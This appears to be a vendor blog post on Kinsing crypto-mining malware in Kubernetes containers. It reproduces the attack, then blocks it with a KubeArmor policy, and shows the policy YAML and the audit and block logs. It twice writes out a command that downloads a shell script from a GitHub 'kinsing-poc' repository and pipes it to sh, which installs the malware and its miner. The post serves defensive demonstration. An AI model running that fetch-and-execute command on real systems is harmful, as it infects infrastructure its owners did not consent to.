Crypto-hijacking and crypto-mining in K8s workloads is increasingly becoming very common.

One of such malware which used the exposed Docker API port to infect and then attempted to spread to other containers on the host is Kinsing Malware! This malware runs a crypto-miner program inside the container and kills any other miners (if running) and deletes the trace by making use of the cron service.

We’ll be talking about the working of the malware in brief and how we can effectively protect our containers from Kinsing using KubeArmor, an opensource Runtime protection tool for cloud workloads  from AccuKnox

Learning the Attack Pattern

The Kinsing malware does multiple things from inside the container, which can be explained as:

  1. Update the contents of the container using the package manager
  2. Install dependency software with the package manager
  3. Initiate a cron service
  4. Download and execute a shell script
  5. Tail the /dev/null to keep the container running indefinitely
Kinsing Malware Workflow

Initiating the Attack

We will be using a Kinsing binary hosted on GitHub along with the shell script needed to initiate the attack. Kinsing serves as a convoy to a crypto-miner Kdevtmpfsi, which will be created and run by Kinsing in the /tmp directory. Let us take a close look at the action

Run the following command from an exploited ubuntu container to initiate the attack

apt-get update && apt-get install -y wget cron;service cron start;wget -q -O - https://raw.githubusercontent.com/vsk-coding/kinsing-poc/main/d.sh | sh;tail -f /dev/null

kubectl exec -it $(kubectl get po -lapp=frontend -o name | cut -c5-) -- bash -c "apt-get update && apt-get install -y wget cron;service cron start;wget -q -O - https://raw.githubusercontent.com/vsk-coding/kinsing-poc/main/d.sh | sh;tail -f /dev/null"

Once the container is updated and the binary wget is installed the executable shell script is downloaded and executed which leads to the installation of Kinsing and the miner Kdevtmpfsi

  • You will see something similar to this in your terminal once you execute the above command

Let us take a look at the resource usage before and after the execution of the above commands.

kubectl top pod $(kubectl get po -lapp=frontend -o name | cut -c5-) --containers

Resource consumption before executing the shell script

kubectl top pod $(kubectl get po -lapp=frontend -o name | cut -c5-) --containers

Resource consumption after executing the shell script

The resource consumption increased by almost 19 times the initial values. Upon close inspection, we were able to see that the Kinsing malware was successfully downloaded and started the miner agent Kdevtmpfsi

Defending against the Attack

With some research, we were able to identify some common patterns the malware exhibited over the attack cycle.

  1. Launches the package manager to meet dependencies
  2. The malware kills all crypto mining processes and their cronjobs
  3. Removes files related to crypto-mining
  4. The malware is downloaded from the internet and stored in the /var/tmp directory
  5. Executing the kinsing binary spawns a new process Kdevtmpfsi under /tmp directory

Although we can’t rely on a single individual suspicious event to unveil the Kinsing attack completely, some of the patterns above are significant enough to draw the SOC team’s attention. So let’s talk about how KubeArmor can help defend against such an attack.

KubeArmor

KubeArmor, an open source software that enables you to protect your cloud workload at run-time.

The problem that KubeArmor solves is that it can prevent cloud workloads from executing malicious activity at runtime.  Malicious activity can be any activity that the workload was not design for, or is not supposed to do.

Given a policy, KubeArmor can restrict the following types of behavior on your cloud workloads:

  • File access - allow / deny specific paths
  • Allow / deny Process execution / forking
  • Allow / Deny Establish network connections
  • Allow / Deny workloads to request other capabilities with the host os. Such capabilities that can enable additional types of malicious behavior.

Disabling the Kinsing Crypto miner with Kubearmor

Armed with the knowledge about the malware above, we were able to block Kinseng Malware by enforcing a simple policy via KubeArmor, the policy is as follows:

We’ve also pushed this policy to the KubeArmor repo so that you can directly use it and patch it available at this link

apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata: 
  name: ksp-mitre-kinsing-cryptomining-malware-block
spec: 
  message: "Incident! Kinsing crypto mining attack is Blocked"
  tags : ["MITRE", "T1496", "S0599", "MALWARE", "T1059.004", "T1059", "Crypto Mining", "CVE-2020-7961"]
  selector: 
    matchLabels: 
      app: frontend     #replace suspected pod's label here
  process:
    severity: 1
    matchPaths:
      - path: /tmp/kdevtmpfsi
      - path: /var/tmp/kinsing
    action: Block
  file: 
    severity: 2
    matchPaths: 
      - path: /tmp/kdevtmpfsi
      - path: /var/tmp/kinsing
      - path: /tmp/zzz
    action: Audit

The Policy coupled with KubeArmor makes sure that the kinsing and kdevtmpfsi binaries are not allowed to execute as well as any access to files named kinsing, zzz, and kdevtmpfsi under any folder hierarchy will be audited and alerted.

The Policy: In-action

You can simply take advantage of our open-source GitHub inventory, and apply policy directly from there:

kubectl apply -f https://raw.githubusercontent.com/kubearmor/policy-templates/main/mitre/system/ksp-mitre-kinsing-cryptomining-malware-block.yaml

Checking the pod resource usage before and after applying the policy

kubectl top pod $(kubectl get po -lapp=frontend -o name | cut -c5-) --containers

Resource usage before applying the policy

kubectl top pod $(kubectl get po -lapp=frontend -o name | cut -c5-) --containers

Resource usage after applying the policy

Looking into the infected pod we could see that most of the malware processes are <defunct>

Checking the policy logs on KubeArmor

To check how to do it, kindly go through our help section

Audit Log Created by KubeArmor

{
  "timestamp": 1636461354,
  "updatedTime": "2021-11-09T12:35:54.980944Z",
  "hostName": "gke-test-10241-default-pool-9cf6a52a-f4s8",
  "namespaceName": "default",
  "podName": "frontend-594b5fb56f-7b7mg",
  "containerID": "575d32b8728c0d3ac166bf7a9c5bb2a443c92f6f963c81d8eb67e13b4bfef6fa",
  "containerName": "server",
  "hostPid": 920634,
  "ppid": 1,
  "pid": 1807,
  "uid": 0,
  "policyName": "ksp-mitre-kinsing-cryptomining-malware-block",
  "severity": "2",
  "tags": "MITRE,T1496,S0599,MALWARE,T1059.004,T1059,Crypto Mining,CVE-2020-7961",
  "message": "Incident! Kinsing crypto mining attack is Blocked",
  "type": "MatchedPolicy",
  "source": "/tmp/kdevtmpfsi",
  "operation": "File",
  "resource": "/tmp/kdevtmpfsi",
  "data": "syscall=SYS_OPEN flags=/sys/devices/system/cpu/online",
  "action": "Audit",
  "result": "Passed"
}

Blocked Log Created by KubeArmor

{
  "timestamp": 1636461518,
  "updatedTime": "2021-11-09T12:35:54.980944Z",
  "hostName": "gke-test-10241-default-pool-9cf6a52a-f4s8",
  "namespaceName": "default",
  "podName": "frontend-594b5fb56f-7b7mg",
  "containerID": "575d32b8728c0d3ac166bf7a9c5bb2a443c92f6f963c81d8eb67e13b4bfef6fa",
  "containerName": "server",
  "hostPid": 920634,
  "ppid": 1,
  "pid": 1807,
  "uid": 0,
  "policyName": "ksp-mitre-kinsing-cryptomining-malware-block",
  "severity": "1",
  "tags": "MITRE,T1496,S0599,MALWARE,T1059.004,T1059,Crypto Mining,CVE-2020-7961",
  "message": "Incident! Kinsing crypto mining attack is Blocked",
  "type": "MatchedPolicy",
  "source": "sh",
  "operation": "Process",
  "resource": "/tmp/kdevtmpfsi",
  "data": "syscall=SYS_EXECVE",
  "action": "Block",
  "result": "Permission denied"
}

Accuknox's policy templates repository

Accuknox's policy templates is an open source repo that also contains a wide range of attack prevention techniques including MITRE, as well as hardening techniques for your workloads. Please visit https://github.com/kubearmor/policy-templates to download and apply policy templates.

Conclusion

Kinsing malware indicated a repetitive pattern during an attack leading to a discoverable attack signature.

Without a profound knowledge of the process activities, file activities, and network activities from your cloud-native environment and the assistance from a keen discovery engine, it'll be difficult to identify such an attack. It’ll be troublesome to uncover any such ongoing malicious activity

By utilizing KubeArmor we were able to effectively protect against Kinsing malware and KubeArmor was also able to defunct the running malicious processes